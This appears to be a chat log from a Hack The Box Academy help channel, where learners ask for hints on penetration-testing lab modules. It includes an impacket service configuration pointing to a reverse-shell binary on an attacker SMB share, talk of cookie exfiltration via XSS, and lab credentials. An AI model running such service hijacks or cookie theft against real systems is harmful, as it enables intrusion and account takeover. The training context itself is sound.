#modules

1 messages ยท Page 316 of 1

foggy monolith
#

On the MS01 target, trying to access DC01 from there

fathom pendant
#

๐Ÿ‘

#

The callback ip I don't think is 172.16.1.10

foggy monolith
#

Oh, that's the callback IP โ€” forgot about that. Alright, trying again.

fathom pendant
limpid hemlock
#

Hey im trying to solve bypassing encoded references section from web attacks module in this try to download contracts of employes to get the flag when i capture the request i get a url encoded base64 value

#

I am trying to fuzz to 1 to 20 by doinh the same convert to base64 then to encodeurl

#

I dont seem to be getting the flag

fathom pendant
jovial cliff
#

i am running it as admin.
Is the HTB host not open to installing PSGallery modules?

limpid hemlock
#

I tried post changed from get

fathom pendant
#

Your request should mimic the request you intercepted

limpid hemlock
#

.m

fathom pendant
#

Not much more I can say about it tbh

bright pivot
foggy monolith
fathom pendant
fathom pendant
bright pivot
#

but i already got the flag

swift laurel
#

@fathom pendant I went back and tried again on the web fuzzing skill assessment and got it finally haha, thank you for your guidance. ๐Ÿ™‚

bright pivot
fathom pendant
plucky hollow
fathom pendant
fathom pendant
bright pivot
fathom pendant
#

The answer he got was for the previous section

bright pivot
#

to remove the limit

fathom pendant
plucky hollow
fathom pendant
#

The screenshot he showed was the answer for the previous section

#

So. Not the right answer

plucky hollow
#

lol thats what i said

#

ยฏ_(ใƒ„)_/ยฏ

bright pivot
fathom pendant
#

It won't make much of a difference

#

I didn't from what I recall

limpid hemlock
fathom pendant
#

:)

#

Not an idiot, just learning

bright pivot
hollow knot
#

one big question

fathom pendant
#

Just be patient

fathom pendant
hollow knot
#

what's this server about

#

fr

plucky hollow
fathom pendant
hollow knot
#

oh shi

#

my bad ๐Ÿ’€

fathom pendant
hollow knot
#

bruh

#

:(

fathom pendant
#

You think I'm joking

#

But there's plenty of people that pop in and ask for something blatantly illegal

hollow knot
#

i have 0 knowledge about computer programming

fathom pendant
#

Programming knowledge isn't required tbh

hollow knot
#

wait fr

plucky hollow
hollow knot
#

LESGOOOOO

fathom pendant
#

It helps

#

But it's not required

hollow knot
#

what about languages

fathom pendant
#

Most things that deal with code basically tell you what to do

hollow knot
#

oh

fathom pendant
#

Bash,php,js are the big ones

hollow knot
#

uh

#

ok ๐Ÿ‘ ๐Ÿ’€

#

ok so

plucky hollow
hollow knot
#

where do i start if im into cybersecurity

acoustic owl
compact patrolBOT
hollow knot
#

SORRY I DIDNT MEAN TO TYPE THAT

fathom pendant
hollow knot
#

i've heard python is easy

plucky hollow
fathom pendant
#

Got one that allows me to change vpn region, just need to update it with my session cookie and xsrf token

acoustic owl
hollow knot
#

and one more thing

#

maths ๐Ÿ’€

#

how complex does it get

fathom pendant
#

Math's isn't required for programming

#

Or cybersecurity

hollow knot
#

coding?

fathom pendant
#

Programming == coding

hollow knot
#

oh

fathom pendant
#

You only need math if your code is using math

#

ยฏ_(ใƒ„)_/ยฏ

plucky hollow
hollow knot
#

basically i'm really interested in cyber security so i just needed some basic info

hollow knot
#

goated

fathom pendant
#

The beginners Bible linked earlier is a good start my guy

hollow knot
#

thanks guys

fathom pendant
#

The academy has an information Security Foundations path

hollow knot
#

im trolling so bad

fathom pendant
#

I'm using my guy as a general term

#

Not gender specific

hollow knot
fathom pendant
#

Like he's a dude, she's a dude, we're all dudes

hollow knot
#

๐Ÿ’€

craggy herald
#

can anyone help me with this:
Image
is this the nibbles initial foothold walthrough module, this command is supposed to give me a reverse shell after executing this
ive also tried pwd as id and it still doesnt work

fathom pendant
#

It needs to call to your ip/listener

craggy herald
#

not my target?

fathom pendant
#

Correct

#

How does it know to call you?

craggy herald
#

ah

#

ok ty

fathom pendant
#

Think of nc as a phone dialer

unique salmon
misty summit
#

Who's on the Windows fundamentals module?

fathom pendant
#

Just ask your question:)

misty summit
#

Im doing the module and stuck on the 3rd question...

fathom pendant
#

What is the section name?

frosty geyser
#

Is there a way to exploit? Sudo vers

#

Hi

fathom pendant
#

You gotta be willing to search for answers

#

Not just run to the discord to do your research for you

frosty geyser
fathom pendant
#

Depends on the sudo version

#

ยฏ_(ใƒ„)_/ยฏ

frosty geyser
#

1.8.31

fathom pendant
#

Brother

#

I implore you

frosty geyser
#

I have sessions for target

fathom pendant
#

do it yourself

#

search sudo 1.8

#

See what that turns up in msfconsole

half stag
#

hey everyone
needed some help with the Post-Exploitation Persistence part in Attacking Enterprise Networks

rustic sage
#

Hey boys

fathom pendant
rustic sage
#

I made a diss track on tryhackme

fathom pendant
half stag
rustic sage
#

Damn it got removed ๐Ÿ˜‚

fathom pendant
fathom pendant
#

And academy

rustic sage
#

But im in the off topic chat

fathom pendant
#

No... you're not

rustic sage
#

Oh wait

half stag
rustic sage
#

Your right, my bad ๐Ÿ˜‚

fathom pendant
fathom pendant
#

So I can't help you

half stag
#

lol thanks

rustic sage
#

I canโ€™t access the off topic

fathom pendant
half stag
rustic sage
#

Are any of you students registered on academy?

fathom pendant
#

Yes

#

This isn't an idle chatter channel

rustic sage
#

Well I canโ€™t access any other channels ๐Ÿ˜Ž

fathom pendant
#

There's explicit instructions there :)

rustic sage
#

๐Ÿ’€

#

Thatโ€™s all I gotta say

fathom pendant
#

I mean you can say that. But I'm telling you how to access other channels

#

If you can't read, that's not my problem

rustic sage
#

No your not telling me how to do anything, youโ€™re directing me to the welcome channel that has instructions ๐Ÿ’€

fathom pendant
#

Yes

rustic sage
#

Listen im not trying to be rude

fathom pendant
#

Which tells you how to verify, and access other channels

#

Sorry that I'm not copy/pasting the instructions here your highness, didn't realize I had to cater to you

rustic sage
#

Woah there, now thatโ€™s a bit toxic.

#

Letโ€™s stop this conversation ๐Ÿ™‚

foggy monolith
#

Pass-the-Ticket section of the Password Attacks module is taking 10 minutes and counting to spawn the target.

#

US-West-5 which has "Low Load" attached to it, so I'm not sure if it's the VPN connection that's the problem.

fathom pendant
#

The vpn servers don't have a location tied to them

#

Pwnbox does

#

But the vpn servers are (US|EU)-academy-{1..6}

foggy monolith
#

Well the PwnBox I'm connected to is 25ms which is better than all the others. Switching to US-6 to see if that makes a difference.

#

Nope. Still says spawning and it's now been 15 minutes

fathom pendant
#

Pwnbox region and vpn region are separate

foggy monolith
#

Aware of that. But again, still doesn't do anything to solve the hang at "Targets are spawning"

fathom pendant
#

Change vpn regions, you'll likely need to restart the pwnbox

foggy monolith
#

Update: finally spawned after nearly 20 minutes

tiny yacht
#

Hey, question regarding
Module: Kerberos Attacks-Unconstrained Delegation - Users
"callum.dixon:C@lluMDIXON has Unconstrained Delegation set and carole.rose:jasmine has genericwrite over callum.dixon. Using this information, try to compromise the domain and read the content of C:\flag.txt on DC01."

Can anyone provide some info regarding that ?

frosty geyser
#

@fathom pendant Is there another way for me to exploit Sudo?

fathom pendant
frosty geyser
#

Yes

#

I don't know why exploitation is not exploited

fathom pendant
#

Did you set the session, lhost, lport?

#

You'll need to change lport from default

frosty geyser
#

Yea

#

Nothing

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

#

What is the error it's giving

frosty geyser
fathom pendant
#

Did you try all the available exploits?

frosty geyser
#

I sent you a private picture

fathom pendant
#

I didn't consent to dm :))

frosty geyser
#

Come on just once please pro โค๏ธ๐Ÿ™„

fathom pendant
#

Alternatively just reset the target and try again

fathom pendant
rustic sage
#

@keen jolt is a scammer don't trust him

frosty geyser
fathom pendant
rustic sage
#

How do I do that bro

fathom pendant
#

see on the side (if on desktop) the people under Administrator/Moderator --> go to them

frosty geyser
#

Did you see the picture?

#

I'm still in root password

#

I didn't understand how to get a root password

fathom pendant
#

you don't need a root password

frosty geyser
#

Lab It requires

fathom pendant
#

??

#

the section you're working on does not require a sudo password

#

lmao

#

literally just spun up a target and performed the necessary steps

#

no pw required

frosty geyser
#

Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.

fathom pendant
#

OH

#

I thought you were doing the metasploit module

#

not the password attacks module

#

:)

#

:)))

#

see what happens when you don't communicate what module and section you're on?

amber parrot
#

Information Gathering - Web Edition skills assesment question 3 for the API key, I've found the h1dd3n admin directory, but the page won't load and all of my recons that I tried just give an error, anything i'm missing?

fathom pendant
#

you need to use another person's login to find information; one of the tools in the module is useful

fathom pendant
#

or don't

fathom pendant
#

:) in this case Sudo Might not be vulnerable for the password attacks module

fathom pendant
#

you don't need metasploit for this

#

check will's history if i recall correctly

fathom pendant
#

but you can usually get it with curl

frosty geyser
fathom pendant
#

what command in linux can be used to check history

#

:))))))))

amber parrot
fathom pendant
amber parrot
#

nevermind it is the / that made the difference!

fathom pendant
#

yeah

amber parrot
#

thank you!

fathom pendant
#

it's a bit of a tricky bitch imo

amber parrot
#

all those hours searching just for a / ;D

fathom pendant
fathom pendant
#

find doesn't display history

#

it just finds files on the system

frosty geyser
fathom pendant
#

ah ok

#

since you apparently don't know how to frame your question:
you're on the passwd, shadow, & opasswd section

#

in which case my hint here is actually... just look in will's home

frosty geyser
#

The problem is that I want to open the shadow file, I can't

fathom pendant
#

dude

fathom pendant
#

did you list ALL

#

:)

#

just doing ls or ls -l doesn't show hidden files or directories

#

ah now i remember... we were literally guiding you to this like yesterday

#

and told you to ignore sudo and /etc/

#

don't focus on that

#

the questions in this module are generally giving you the end goal

frosty geyser
#

What should I do?

fathom pendant
#

adm

#

when you ssh in

#

do not cd anywhere

#

just look directly where you are

#

you need to list all files in home

frosty geyser
#

Kira / sam / will

fathom pendant
#

i meant will's home

#

๐Ÿคฆ

frosty geyser
#

I know in home will there

#

Kira sam will

fathom pendant
#

look. at. will's. home

#

that's all

#

that will lead you forward

frosty geyser
#

Nothing

fathom pendant
#

trust me there's something

#

it might be hidden

#

but there's something

#

and if you don't know how to list hidden files in linux at this point i really can't help you

frosty geyser
#

Ok

fathom pendant
#

ls --help

#

maybe that's useful

frosty geyser
#

Ok thanks bro

prime flame
#

gotta ferret around those commands, learn their ins and outs

frosty geyser
#

I found the solution

fathom pendant
#

good now you have the next step forward

shut vapor
#

you have a lot of patience

fathom pendant
#

:)))) the amount of stupid there pales in comparison

#

at least he knows how to type things

#

:)

shut vapor
#

Somewhere along the way I lost a great deal of my ability to not exhibit frustration with support issues.

unique ether
#

Does anyone else sometimes forget the previous module yea I have my notes and stuff but I still forget like small configs

inner grail
#

Guys, I was hacked, can anyone help me please?

acoustic owl
plucky hollow
smoky marten
#

okay I feel like i'm crazy but, what?

is that not the same exact payload it just said failed? (the payload does work)

fathom pendant
#

It happens

smoky marten
#

looking at the logs it looks like the one that failed had ) as a prefix and the successful one had none; but why doesn't it test for no prefix before saying it failed??

smoky marten
ivory moat
#

What is the best hack that anti cheats don't detect for box pvp?

#

(minecraft)

smoky marten
#

...

ivory moat
#

I can't use the general channe

#

l

smoky marten
#

I donโ€™t think this is the right server for that question

ivory moat
#

oh sorry, I just googled minecraft cheats and this server came up :c

smoky marten
#

huh

#

odd

ivory moat
#

Do you know of any servers that are dedicated to Minecraft hacks?

smoky marten
#

I donโ€™t, sorry

and iโ€™d be careful where you ask around about cheating

#

if you wanna learn cybersecurity you can stick around though /hj

fathom pendant
wary tendon
#

im doing the aen ansd im lost on how to run the ttimmons part it keeps failing and i am admin

#

this fails

limber river
fathom pendant
#

Consider any aspect that has to be discovered a spoiler, including passwords

wary tendon
#

srry i just dont know how to tell you enough info

#

ahhh i see mybad

fathom pendant
#

While yes the module is a guide itself, most people do it blind meaning they don't even look at the module at all

#

No questions or outside help

gray yacht
wary tendon
#

this is literally going nowhere

#

it ask for pass then it doesnt do anyting

fathom pendant
#

Well I'm assuming you're providing a password, and you ensured the right password was on the clipboard

wary tendon
#

yes

#

but also i tried all thrree ips

#

.20 .3 and .50

#

none work

fathom pendant
#

If you're really hitting a wall and need help to move forward, just read the module up to where you're stuck

wary tendon
#

i am but i have done it to the t

fathom pendant
#

Otherwise potentially reset the lab environment and see if maybe something wasn't loaded properly

#

As stated AEN itself is the walkthrough

#

So if you're struggling following it either your lab is bugged or you're doing something wrong

static roost
#

#Module: ADCS Attacks
#Section: ESC3
#Subsection: ESC3 Abuse Requirements

Not having any issues yet. Just trying to understand the "schema" version of certificate templates. In the subsection condition 2, it refers to an "Application Policy Issuance Requirement" for the target template. But I'm not finding much information that elaborates. How exactly would we verify if a template meets this requirement via server manager or LDAP without simple checking the schema version number? I hope this makes sense.

cloud urchin
#

can certipy/certify do it? certify template /show?

#

it might be something like certify find /showallpermissions

limber river
#

will mention that

cloud urchin
#

yeah that's for listing the templates

potent moss
#

I'm working on the skills assessment for web fuzzing. One of the questions is to discover the full page URL for a website that says "You don't have access!"

I am positive I have the URL but can't get the answer. It keeps telling me I'm wrong. Anyone else run into this issue?

wary tendon
#

yea its the same thing after reseting the target

cloud urchin
#

i just looked, cetify find sees the schema version

#

plus you can just use /vulnerable and it'll find it for you

wary tendon
#

then i do the ps credentialing and when i use get psn.py it fails to do anything

potent moss
trim frost
#

make sure you have no spaces

potent moss
smoky marten
#

can you dm me what youโ€™re entering?
(is this allowed? iโ€™ve completed the module)

fathom pendant
#

Instead of the port number

potent moss
fathom pendant
#

:)))))))

smoky marten
potent moss
#

Thank you that worked lol

gray yacht
smoky marten
#

damn I need to be more clear

fathom pendant
smoky marten
potent moss
smoky marten
#

thereโ€™s still a rule about not spoiling modules though

potent moss
fathom pendant
#

It's a bit of a trust thing

#

Dms are kinda Grey area as you don't know if the person has/hasn't passed it

#

It's mostly public where it's frowned upon

cloud urchin
#

all depends on what staff is active, some allow it/do it themselves and some say you can't do it at all

#

which totally clears it up

smoky marten
#

alright

#

iโ€™ll just be honest about it and stop if iโ€™m asked

cloud urchin
#

believe it or not, straight to jail

smoky marten
#

;-;

fathom pendant
#

In general. The best practice is to obfuscate as much as possible while still conveying your question

#

I.e. the A* user, or password p*

#

Or in some cases password A1..H8

#

With the first and last 2 characters

#

Other ways is if you obtained a file; md5sum

hushed sail
#

what section? need more info.

try adding the ip (without the port) to your hosts file and run the scan with the domain name

whole grotto
#

Can anyone help me with introduction to metasploit

#

Im on the payload section

#

I used this exploit(multi/http/apache_druid_cve_2023_25194)

fathom pendant
#

index.php isn't the endpoint. Utilize all fuzzing techniques to discover the right file you'd pass parameters to

fathom pendant
fathom pendant
#

In this case the right endpoint will explicitly tell you what the parameter is it wants you to fuzz when you visit it

whole grotto
fathom pendant
#

Literally every stop along the way in this assessment tells you where next

fathom pendant
whole grotto
fathom pendant
#

Consider each bit a keyword

fathom pendant
#

There is an older expected exploit to use

#

You have to always bear in mind that module information regarding msfconsole may change due to new exploits being discovered since the module came out

whole grotto
#

Cause msf says its vulnerable

fathom pendant
#

Yeah but the expected exploit to use is older

#

Yours is marked 2023

#

Also just bc it says it's vulnerable doesn't necessarily mean it is

frigid wedge
#

so you gotta find the domain first?

fathom pendant
#

The first step is finding the right endpoint to give up the domain

#

The assessment tests you on practically everything taught in the module

#

From extension fuzzing to subdomain fuzzing and recursion

#

Each successful step along the way will give you breadcrumbs to the next

whole grotto
#

How am i so bad at this๐Ÿ˜ญ

fathom pendant
#

You're in the right directory

whole grotto
#

I pwned axlle with almost no help but i cant even use msf๐Ÿฅฒ

fathom pendant
whole grotto
#

Yeah i got it

fathom pendant
#

One of the results should be r..

whole grotto
#

Thx btw

frigid wedge
fathom pendant
#

Just usage of a tool

fathom pendant
uncut crystal
#

Hii

#

Is htb coupon codes buying option available to redeem for later uses?

frigid wedge
#

so i found a vhost, but im getting this : Unable to validate base domain: (not exposing the vhost) (lookup vhost on 1.1.1.1:53: no such host)

fathom pendant
frigid wedge
fathom pendant
#

Only the ip and domain (vhost you found) go in the hosts file

#

Protocol and ports don't go in the hosts file, as the hosts file is just a local dns

frosty tide
#

Hello, I been spawning a target on HTB Acaedmy for like over 5 mins now and it still not finish, is there a way to fix this?

frigid wedge
fathom pendant
frosty tide
#

The target question not the pwnbox

fathom pendant
#

Vpn region != pwnbox region

frosty tide
#

Where to change it

#

oh i found it

frank sun
#

Hello guys - https://academy.hackthebox.com/module/147/section/1335

I tried few CVEs per linpeas but nothing is working. Just want to try cracking id_rsa from the same user. But the permission to view is not available - -rw------- need help on transferring to my host. Tried few file transfer methods, its throwing permission denied as expected.

frosty tide
#

thank you

fathom pendant
#

Also you don't need to crack anything either

fathom pendant
frank sun
fathom pendant
#

Also fun fact, the owner of a file on standard Linux installs always has full control of a file

fathom pendant
frank sun
fathom pendant
#

Also there's a command simply called "history" you can use

frosty tide
#

I change the VPN server to US Academy 1 and it sstill show target(s) are spawing

fathom pendant
frosty tide
#

I refresh page and it show that, no button to spawn

#

After refresh page it show
Fetching status -> Target(s) are spawning

fathom pendant
#

Reach out to support then ig

#

ยฏ_(ใƒ„)_/ยฏ

#

Green bubble on the bottom right of academy

frosty tide
#

Aight I try contact them thank you

#

oh it back now finally

tired socket
#

Having the same problem. Seems to occur at night on the east coast. Only see targets are spawning and it sits there spinning. Tried changing vpn, relogging in - no good

frosty tide
#

Mine coming back after quite sometime

misty socket
frank sun
frank sun
#

I'm in as root

fathom pendant
#

Oh sorry I might have been looking at the wrong module somehow

frank sun
#

no problem, thank you

fathom pendant
#

I swear the link you shared opened somewhere else lmao

#

Anyway

#

I was thinking of the ez one not the med one

#

Deleting spoilerish info

frank sun
frosty tide
#

On the Web Attack Module, Advance File Disclosure section. It showing two attack method the CDATA and the error base. I some how get error base to work but the CDATA not work

fathom pendant
fathom pendant
frosty tide
#

Ohh, I thought it can do both

fathom pendant
#

This module is very much not everything you see is what you get

#

Also as a note, save the different dtds they have you make under different names

smoky marten
fathom pendant
smoky marten
#

ik

#

just making a joke

queen moss
#

Hi

safe star
#

yo

frosty tide
whole grotto
#

Im on meterpreter section

#

And im stuck to find a working exploit for the machine

#

Its sayad existing exploit but ms17-010 didnt work

frosty tide
sharp grail
#

Hi guys can someone give me free cubes or gift card for def sec analyst ๐Ÿฅน I Wanna learn in advance .
I'm an HS student

storm elk
sharp grail
storm elk
frosty tide
smoky marten
#

iโ€™m dead stuck on sqlmap essentials - skills assessment. I genuinely canโ€™t find a single parameter to be vulnerable, iโ€™ve tried crawling and fuzzing in case iโ€™m missing anything but nothing seems to have any functionality that would interact with a database; even search functions and forms seem to just dry reload the page on client side without doing anything

frosty tide
#

Try to find a working parameter and tune your attack

#

Also try to understand what kind of attack technique possibly going to be so you can reduce the time you going to spend on waiting

sharp grail
#

I'm not rich either.. I'm currently working freelance and part time .. that money I can't afford yet ๐Ÿคง...

Can you guys give me a roadmap to path I wanted to take.. I want to learn def sec and offsec in dept but there is no free platform online ...

๐Ÿ™

frosty tide
#

save your money at least 20-30$ a month you can get the platinum plan in 2-3 months after saving which going unlock a bunch of module from tier 0 to tier 2

#

you can grind back some cube after complete module too... also tier 0 is free

#

Edited: You can earned back the amount of cube you spend to unlock tier 0 after completing tier 0

sharp grail
#

Yeap can I make more cubes by grinding tier 0 or is their a limit you can save?

frosty tide
#

Tier 0 cost you like 10 cube as I remeber and you earn back 10 cubes. So you can learn all module in tier 0

#

for higher tier you gotta buy cube

#

My suggestion is save money from now and learn module in Tier 0, after you got some money for the platinum plan then go for higher

fathom pendant
#

Net neutral/negative

sharp grail
#

I dont want to learn everything that's outside the path I wanted tho

sharp grail
frosty tide
#

Learn basic and foundation first

sharp grail
#

Aight thanks guys

fathom pendant
sharp grail
#

I already know server auditing and net security however what I'm lacking is penetration and exploitation since the best defense is to know the offense..

smoky marten
fathom pendant
sharp grail
#

I know how to use tools but I don't want to be script kiddie all my life .. guess the only way is to save up

smoky marten
fathom pendant
frosty tide
#

There many techqnie like BEUSTQ, try to figure out which one is it, gonna be some help too

fathom pendant
#

Everything for the skill exam is covered by the module

#

Including the techniques

frosty tide
#

I did it with the tech that time it save lot of time

fathom pendant
#

It will be a bit of trial/error

fathom pendant
frosty tide
#

Aight noted

fathom pendant
#

Only dig deeper if what's taught isn't working

smoky marten
fathom pendant
smoky marten
#

yep and yep

fathom pendant
#

:))

frosty tide
fathom pendant
smoky marten
#

yep, that and burp

safe star
smoky marten
#

I think something might be broken on my end cause neither of those even send requests at all

#

they just soft refresh the page

fathom pendant
safe star
#

Are u getting an alert?

smoky marten
#

nope

fathom pendant
#

Try it for every item

smoky marten
fathom pendant
#

But the "add to cart" button should send the request

safe star
smoky marten
#

nope, nothing in burp and nothing in network

safe star
#

If not then ur not clicking the wrong thing

fathom pendant
#

The literal button that says add to cart, none of the other buttons afaik

safe star
#

I did it a few hours ago

frosty tide
#

intercept the trafice forward it 1 by 1

safe star
#

No other buttons go through the server Iโ€™m pretty sure

fathom pendant
#

Reset the lab

#

Try again

smoky marten
#

same deal

thatโ€™s my 3rd lab reset also

safe star
#

Try to hover over buttons that donโ€™t forward to index.html

#

Canโ€™t test it rn

smoky marten
safe star
#

The cart button shouldnโ€™t take you to index.html afaik

fathom pendant
#

It shouldn't

#

It should produce the popup that says "item added!!!"

safe star
#

Yeah try looking for a script in the html and it will probably show you which button itโ€™s listening for.

smoky marten
safe star
#

All items?

fathom pendant
#

they shouldn't

smoky marten
#

yea, all of them do

fathom pendant
#

it should be a dom call to shop.html# since its the button that executes the script

#

yeah spawned a fresh one and it's working as intended

smoky marten
#

okay there we go

I restarted it again and now the ones on shop.html are working; any add to cart on index.html is still broken though

fathom pendant
#

those aren't broken

#

those ones are working as intended

#

the only buttons that work are on the shop page

#

:))

smoky marten
#

mmkay

fathom pendant
#

the idea is that you're exploring a shop page for a vulnerability, and sometimes that vulnerability isn't readily apparent on the index page

#

you should always try all pages you can

smoky marten
#

I did try to check everything on every page, I think I just got thrown off since those two look like they should have identical functionality

#

good to keep in mind though, always assume the devs made it weird

fathom pendant
#

yep

#

inspecting the elements of both pages you'll see the add on one page triggers an event, while it doesn't on the other page

#

alternatively consider the devs messed up when initially making the site :)

smoky marten
#

lmao

#

and tyyy

fathom pendant
#

yeah inspecting the source code; the event tag isn't on the index page

#

:)

smoky marten
rustic sage
#

Hey..I am just a beginner in cybersecurity and want to learn linux how should I start
?or if anyone can help me with the roadmap or something...it would be helpful for me!

whole grotto
smoky marten
fathom pendant
whole grotto
#

No its the footage question

#

Autocorrect sorry

urban raptor
#

Can anyone help with NTLM Relay Attacks - Skills Assessment for BACKUP01? I think I'm using the right vector but I keep getting -] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type). Been stuck on this for several days now, running out of ideas. Have taken a look in the shares and found nothing interesting, nothing writable... Tried RCBD but unable to perform the attack... ntpdate does not fix this issue. Any ideas?

whole grotto
topaz crown
#

Hey when I try to lab on instance itโ€™s not working properly

faint trellis
#

Need help with Widows Lateral Movement - SMB Section - 2nd question (the service ALG).

I have encountered the error attempting to get reverse shell :

`impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 start -name ALG

[*] Starting service ALG
[-] SCMR SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.`

while, my reverse shell is located in the SMB share and the user Lich is successfully authenticated by SMB.

`impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 config -name ALG

[*] Querying service config for ALG
TYPE : 16 - SERVICE_WIN32_OWN_PROCESS
START_TYPE : 3 - DEMAND START
ERROR_CONTROL : 0 - IGNORE
BINARY_PATH_NAME : \10.10.14.167\share\rshell-8080.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Application Layer Gateway Service
DEPENDENCIES : /
SERVICE_START_NAME: INLANEFREIGHT\Lich`

ll rshell-8080.exe -rwxrwxrwx 1 root root 48K Aug 30 01:06 rshell-8080.exe

Please, tell me what's wrong?

autumn pilot
worldly tangle
#

Does anyone know how or where i can find solo leveling arias hacks/cheats?
I am new here

smoky marten
worldly tangle
#

Do you have any suggestions for discord servers providing cheats for games๐Ÿ˜… because i am totally new to discord stuff

smoky marten
#

I donโ€™t, but my suggestion would probably be to either get gud or go play a game you can actually enjoy without cheating

fathom pendant
#

Please don't include anything you had to Fuzz for in your question

#

But the Web Fuzzing skill assessment tests you on everything you were taught in that module

pseudo kiln
#

when the author mentions to unzip the alpine image, will any alpine image do ? Or it has to be a custom one from sone github ? I have done this before on machines and it was usually some github alpine image, but the author gives no detail in this regard

pseudo kiln
#

i really have no idea where they are getting this alpine.zip from

faint anchor
#

Hey yall, im currently doing the skill assessment for the information gathering-web edition module and im like hard stuck at a part which i think is a technical issue..? basically (spoiler for module) ||i found the web1337 vhost and read into the robots.txt where i found the admin dir, however whenever i try to access it it just seems down? like im unable to connect or perform any kind of thing with the subdomain so i cant get any info out of it. I cant use no tools as they wont connect either so im just not sure how to proceed from here||

spark spruce
rare sky
#

guys i know that is not the channel most appropriate, but what do you think abount develop and implement a SIEM system in CTFs attack and defense?

faint anchor
# rare sky which error do you have?

for both the tools and the browser, it just says that it cannot establish a connection. im not sure if there is another way to obtain the API key in the admin dir without enumeration, but i cant seem to enumerate anythin without establishing a connection herosadge

faint anchor
#

vpn is up i can access the main domain

rare sky
#

ok, have you add the subdomain in your host file?

faint anchor
#

yep

rare sky
#

ok, so you are stucked on thrd flag, right?

faint anchor
#

mhm

#

ill restart my router or somethin man, because spoilers ||curling the domain didnt work, yes i made sure it wasnt https. the domain is in the hosts file||

im out of options at this point :p

rare sky
#

i'm trying it, i'm respawning the target

faint anchor
#

no need, restarting my router did the job lol

#

thanks tho!

rare sky
#

ah ok perfect

faint anchor
#

really weird though but things happen

frosty tide
#

Hello, I'm kind of stuck with the Web Attack Skill assessment, I gather the user but now I dont know where to go next

cold star
#

Hey guys I Need help

rare sky
#

we need the problem to gives you help

cold star
#

The Number Cannot be made in decimal but still I tried every output I could Think Off

#

Also Tried giving in hex and everything

rare sky
#

have you tried with cmdlet Get-ADGroupMember?

dapper moth
#

Hey.... Perhaps some contributor or staff can point me out to the direction here.
I think there is some kind of malformation in the Cheat Sheet Generation script for the Blind SQL Injection Module.

It generates the content way too small compared to the other modules and unformatted.

rare sky
#

the user forend is part of this group?

cold star
rare sky
#

maybe can be the others member at exclusion of your user, so 9

dapper moth
#

No! That's the answer

cold star
dapper moth
#

Try removing any message that would give a direct answer in this channel

dapper moth
cold star
cold star
#

Its a 10 I have tried 10.0, 0.10 And 0x10 also

#

Yws Didnt worked

dapper moth
#

Mine is green here with that value

cold star
#

There was one space

dapper moth
#

Told ya

cold star
#

And thier hint even confused me more

normal sand
#

How would ya'll differentiate between Discovery, Footprinting, and Enumeration?

cold star
vernal hamlet
#

hi guys

#

im stuck in this question in the joomla attack section in the ATTACKING COMMON APPLICATION Module This is the question ( Leverage the directory traversal vulnerability to find a flag in the web root of the http://dev.inlanefreight.local/ Joomla application ) and i used the script to list the directory but i cant read the content of them so i cant read the flag

#

I need help if possible

next bronze
rare sky
#

but the question asks you explicitly the content of the flag? because this flag file has a strange name so it can be the flag

#

if it is please remove the spoiler

vernal hamlet
#

its not

#

i just tried even with HTB{}

next bronze
#

open the file in your browser, you already know the file name

#

the name is also a spoiler btw, pls remove it

vernal hamlet
#

i will try it

vernal hamlet
rare sky
#

you have the directory and the file name, search them in browser

marsh echo
#

you tried read the flag ?

#

you did the webshell right ?

#

don't forget to replace spaces with +

#

you also need to have the correct path to your file to request it from the server URL/goodpath/file?param=cmd+.../

next bronze
#

it's not a webshell, just path transversal

#

simply http://sever.com/flag.txt

marsh echo
#

yes but for the pathtransversal it must first be the webshell ( which it modifies in the protostar templates )

#

personaly this is how I found the flag

rare sky
#

i'm confused

marsh echo
#

Are you at the joomla attack section?

rare sky
#

yes

vernal hamlet
#

and thanks everyone for the help

marsh echo
# rare sky yes

I followed the course I went in the template protostart I added my webshell in the page error.php then I saved it

rare sky
#

ah ok you have followed another way

grand portal
#

FootPrinting module, medium lab Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer. i got the || alex and sa (system administrator) with credential as well but following the hint its probably the mssql id,pass. tried, did not work. || any hint would be fine.

marsh echo
grand portal
#

@fathom pendant could you help with this

marsh echo
rapid thorn
#

Guys can anyone help me

marsh echo
marsh echo
acoustic owl
rapid thorn
#

Okay

#

Can I dm you?

grand portal
fathom pendant
#

Perhaps a powerful one you'll find in all Windows installs

fathom pendant
rapid thorn
#

Oh okay, sorry

fathom pendant
#

That's not a windows account name

#

Maybe when you sign into the system check c:\users

grand portal
#

okay, let me try

pure gulch
#

Heya, i'm newbie here

#

Somehow I can't change my nickname to ascii letters on this server

fathom pendant
marsh echo
fathom pendant
#

You can use those creds

marsh echo
fathom pendant
#

Maybe not the username but the pw

normal sand
#

Module: Attacking Common Applications
Section: WordPress - Discovery & Enumeration
Link to section: https://academy.hackthebox.com/module/113/section/1100

Find the version number of this plugin. (i.e., 4.5.2)

Been on this question a while, so I thought I'd ask. I've solved the prior questions. I've read the hint but hasn't really helped. This is what I've tried:

  • I've tried reading the source code of where this plugin is mentioned.
  • I've tried wpscan.
  • Since directory listing is enabled, I tried checking the directory (/wp-content/plugins/<plugin-name>/) and there's no listing.
marsh echo
#

aah wait maybe I'm talking nonsense here

fathom pendant
fathom pendant
#

And since you're on q3, you've answered q2

fathom pendant
normal sand
fathom pendant
#

Yes

#

:)

normal sand
#

When I tried navigating to the directory, there's no listings of files.

fathom pendant
#

I didn't say in the directory listing

#

I just said did you look for a readme.txt

normal sand
fathom pendant
#

No.

#

In that directory

#

As in did you try just throwing it on there

#

And just seeing

marsh echo
fathom pendant
#

As most plug-ins and such come with a readme

fathom pendant
normal sand
normal sand
stoic adder
#

Has anyone here completed the 'Exploiting XSS via WebSockets' in the 'Modern Web Exploitation Techniques' module on HTB Academy? I received a hint: 'The admin uses a firewall that prevents you from exfiltrating the cookie directly.' I've tried other JavaScript commands like alert or document.documentURI, which work normally, but document.cookie seems to be blocked. I've tried jsf*ck, adding timing to the command, URL encoding, unicode escape sequences, ... but none of them worked.

fathom pendant
#

You can also rdp with the other user

marsh echo
#

I'll try again always good to know

next bronze
stoic adder
fathom pendant
#

